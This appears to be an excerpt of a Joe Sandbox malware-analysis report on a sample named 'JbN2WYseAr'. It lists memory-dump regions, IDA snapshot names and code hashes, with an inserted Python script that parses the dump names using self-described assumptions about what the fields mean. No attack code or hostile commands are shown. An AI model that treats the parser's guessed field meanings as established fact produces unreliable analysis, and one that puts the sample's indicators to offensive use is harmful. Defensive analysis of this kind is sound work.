                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MH
                                  • API String ID: 0-3655429238
                                  • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                  • Instruction ID: 4b16dd12c47f6f8b9b9b28ff91a50c9e691c25206deba3ac42060ccdf710b1b3
                                  • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                  • Instruction Fuzzy Hash: 6D2264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H
                                  • API String ID: 0-2852464175
                                  • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                  • Instruction ID: e18e475d138301e4b4ccdb529731c6631850f7484c3e1a92eeeefbe897f041fa
                                  • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                  • Instruction Fuzzy Hash: F891DA317083158FCB18CE1CC59013EB7E3ABC9314F1A857EDA9697356DA359C46878A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: curl
                                  • API String ID: 0-65018701
                                  • Opcode ID: d19bde22f27d611d0302c1e732506f00c4cea8e69cb5813b2b673846d3c31cd9
                                  • Instruction ID: c10155292f1dcfb5991e6f9162758ae1f4dfcb6fcd32469fa5c5c2813a32bfcb
                                  • Opcode Fuzzy Hash: d19bde22f27d611d0302c1e732506f00c4cea8e69cb5813b2b673846d3c31cd9
                                  • Instruction Fuzzy Hash: 7461A7B18087449BD721DF14C84179BB3F8EF99304F04962DFD488B212E735E698C752
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                  • Instruction ID: 64776de11774964372a8a5e87739209c1532e728d3bb33a1ebfd049bf6473cbe
                                  • Opcode Fuzzy Hash: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                  • Instruction Fuzzy Hash: D312C676F483154BC30CED6DC992359FAD7A7CC310F1A893EA859DB3A0E9B9EC014681
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.1420522269.0000000001734000.00000004.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_1734000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74c9dec4b48096f94fb3a806743e4d54083867cc329fbb6dfb0329eec76fa988
                                  • Instruction ID: d421f489d0f0231c98926277d207c5499bfc71a00c4ceddd6db0e45c27d2ef38
                                  • Opcode Fuzzy Hash: 74c9dec4b48096f94fb3a806743e4d54083867cc329fbb6dfb0329eec76fa988
                                  • Instruction Fuzzy Hash: 8EF17D9188E3C04FD7139B7448656A4BFB1AF1B219F0E4ADFC4C29F0A7E319491AD726
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.1420522269.0000000001734000.00000004.00000020.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_1734000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74c9dec4b48096f94fb3a806743e4d54083867cc329fbb6dfb0329eec76fa988
                                  • Instruction ID: d421f489d0f0231c98926277d207c5499bfc71a00c4ceddd6db0e45c27d2ef38
                                  • Opcode Fuzzy Hash: 74c9dec4b48096f94fb3a806743e4d54083867cc329fbb6dfb0329eec76fa988
                                  • Instruction Fuzzy Hash: 8EF17D9188E3C04FD7139B7448656A4BFB1AF1B219F0E4ADFC4C29F0A7E319491AD726
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.1420522269.0000000001734000.00000004.00000020.00020000.00000000.sdmp, Offset: 01734000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_1734000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74c9dec4b48096f94fb3a806743e4d54083867cc329fbb6dfb0329eec76fa988
                                  • Instruction ID: d421f489d0f0231c98926277d207c5499bfc71a00c4ceddd6db0e45c27d2ef38
                                  • Opcode Fuzzy Hash: 74c9dec4b48096f94fb3a806743e4d54083867cc329fbb6dfb0329eec76fa988
                                  • Instruction Fuzzy Hash: 8EF17D9188E3C04FD7139B7448656A4BFB1AF1B219F0E4ADFC4C29F0A7E319491AD726
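                                   The Memory Dump Source entries above name the memory regions each function was carved from, and the dot-separated fields of the .sdmp names carry the region's base address, page protection and region type. The following parser is an added example for this report, not Joe Sandbox code; the meaning it assigns to the fields is an assumption, chosen because the values on this page coincide with the winnt.h constants (0x40 PAGE_EXECUTE_READWRITE, 0x04 PAGE_READWRITE, 0x80 PAGE_EXECUTE_WRITECOPY, 0x01000000 MEM_IMAGE, 0x00020000 MEM_PRIVATE) and because "based on PE: true" appears exactly on the MEM_IMAGE dumps. The sample excerpt is constructed from lines of this report, and pe_flag_mismatches() checks that assumption against the page's own PE flags.

```python
"""Parse Joe Sandbox .sdmp names listed under "Memory Dump Source" and
summarise the regions the functions were carved from.

Added example for this report; not Joe Sandbox code.

ASSUMPTION about the dot-separated fields (not documented on the page):
  <proc>.<stage>.<dump id>.<base>.<protect>.<?>.<type>.<?>.sdmp
<protect> and <type> are read as the winnt.h MEMORY_BASIC_INFORMATION
values; "based on PE: true" on the page coincides with type MEM_IMAGE.
"""
import re
from dataclasses import dataclass

PAGE_WRITE_MASK = 0xCC   # PAGE_READWRITE|PAGE_WRITECOPY|PAGE_EXECUTE_READWRITE|PAGE_EXECUTE_WRITECOPY
PAGE_EXEC_MASK = 0xF0    # PAGE_EXECUTE|PAGE_EXECUTE_READ|PAGE_EXECUTE_READWRITE|PAGE_EXECUTE_WRITECOPY
MEM_PRIVATE = 0x00020000
MEM_IMAGE = 0x01000000

SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\."
    r"(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp"
)
# Non-greedy up to ".sdmp", so a name with "Download File" glued on still parses.
DUMP_LINE_RE = re.compile(r"(?:Source File|Associated):\s*(\S+?\.sdmp)")
SOURCE_LINE_RE = re.compile(r"Source File:\s*(\S+?\.sdmp).*?based on PE:\s*(true|false)")


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    stage: int
    dump_id: int
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & PAGE_EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & PAGE_WRITE_MASK)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.fullmatch(name.strip())
    if m is None:
        raise ValueError(f"not an sdmp name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16),
        stage=int(m["stage"], 16),
        dump_id=int(m["dump"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["type"], 16),
    )


def regions_from_report(text: str) -> list[DumpRegion]:
    """Every Source File / Associated dump named in a report excerpt."""
    return [parse_sdmp_name(n) for n in DUMP_LINE_RE.findall(text)]


def summarize(text: str) -> dict[str, int]:
    regs = regions_from_report(text)
    return {
        "total": len(regs),
        "image_backed": sum(r.image_backed for r in regs),
        # writable + executable pages: where unpacked code gets recovered from
        "exec_writable": sum(r.executable and r.writable for r in regs),
        # private RW, non-executable: data regions, not a mapped PE
        "private_writable_noexec": sum(
            r.mem_type == MEM_PRIVATE and r.writable and not r.executable for r in regs
        ),
    }


def pe_flag_mismatches(text: str) -> list[str]:
    """Source dumps whose 'based on PE' flag disagrees with the MEM_IMAGE type
    (consistency check of the field-meaning assumption above)."""
    return [
        name for name, flag in SOURCE_LINE_RE.findall(text)
        if (flag == "true") != parse_sdmp_name(name).image_backed
    ]


# Constructed excerpt: lines copied from this report's Memory Dump Source blocks.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
Memory Dump Source
• Source File: 00000000.00000003.1420522269.0000000001734000.00000004.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
"""

if __name__ == "__main__":
    for r in regions_from_report(SAMPLE_REPORT):
        print(f"{r.base:#010x} protect={r.protect:#04x} type={r.mem_type:#010x} "
              f"{'X' if r.executable else '-'}{'W' if r.writable else '-'} "
              f"{'image' if r.image_backed else 'private'}")
    print(summarize(SAMPLE_REPORT))
    print("PE-flag mismatches:", pe_flag_mismatches(SAMPLE_REPORT))
```

                                   Run against the full report text, summarize() shows how much of the carved code lives in writable-and-executable image pages, which is what one expects after in-place unpacking of a packed PE; a non-empty result from pe_flag_mismatches() would mean the field-meaning assumption is wrong for that report version.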
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 65dad059f4262517480b625fc020e9406aa0d73a20938c6d9ac299dfcbf5ae5b
                                  • Instruction ID: b608e2f0f13b7dec4db39b6d718fe132654a52cef33bef0877ec8154a7ee7956
                                  • Opcode Fuzzy Hash: 65dad059f4262517480b625fc020e9406aa0d73a20938c6d9ac299dfcbf5ae5b
                                  • Instruction Fuzzy Hash: 1FE12770B083648BD320CF19E48036ABBD2BB85350FA4852FD4958B395D77DDD86DB8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 10198f3ee72690e35423a83473a8f3306fd6af7102d70253ea0f96905cd03f59
                                  • Instruction ID: dfe048cbda756a1532da264b05121e91734d452aeb5acab75874f439a5a11da6
                                  • Opcode Fuzzy Hash: 10198f3ee72690e35423a83473a8f3306fd6af7102d70253ea0f96905cd03f59
                                  • Instruction Fuzzy Hash: B3C18F75604B018FDB24CF29C480A26B7E2FF86354F14CA2DE5AE87791E738E845DB51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 228cf8e953edeea9606a003b78f704d7193757849252f0f5678e5e4ca34f6301
                                  • Instruction ID: cf123fe678bec91e1320a7e45d07ae79a3676f8419a90940e5ccb4ab949d7f66
                                  • Opcode Fuzzy Hash: 228cf8e953edeea9606a003b78f704d7193757849252f0f5678e5e4ca34f6301
                                  • Instruction Fuzzy Hash: F0C17DB1605605CBDB28CF19C490665F7E1FF81350F25866DD5AE8F782DB38E981EB80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                  • Instruction ID: e1133a4362ca76df521cb4e992c8ab1ab258b4a2425b4258b9db3c8df89abeb7
                                  • Opcode Fuzzy Hash: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                  • Instruction Fuzzy Hash: A5A104716083058FC714CE2CC88063AB7E2AFC6310F59866EE69597392E638DC468B86
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                  • Instruction ID: aef379be4b11d5c6635dfe5e1c60fb10e490ac2e569527d7389731e5aef59d8b
                                  • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                  • Instruction Fuzzy Hash: 18A1A531A001998FDB38DE25CC81FDA73A2EFC9310F068625EC599F3D1EA34AD468785
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
